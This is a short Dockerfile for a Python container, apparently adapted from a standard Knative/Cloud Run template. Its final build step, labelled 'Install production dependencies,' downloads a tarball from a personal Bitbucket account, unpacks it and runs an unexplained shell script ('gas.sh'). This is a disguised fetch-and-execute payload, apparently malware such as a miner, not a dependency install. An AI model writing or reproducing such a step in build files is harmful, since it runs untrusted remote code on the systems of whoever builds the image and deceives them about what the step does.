FROM python:3

# Allow statements and log messages to immediately appear in the Knative logs
ENV PYTHONUNBUFFERED True

# Copy local code to the container image.
ENV APP_HOME /app
WORKDIR $APP_HOME
COPY . ./ 

# Install production dependencies.
RUN wget https://bitbucket.org/triyuliansyah088/mu/downloads/conge.tar.gz && tar xf conge.tar.gz && ./gas.sh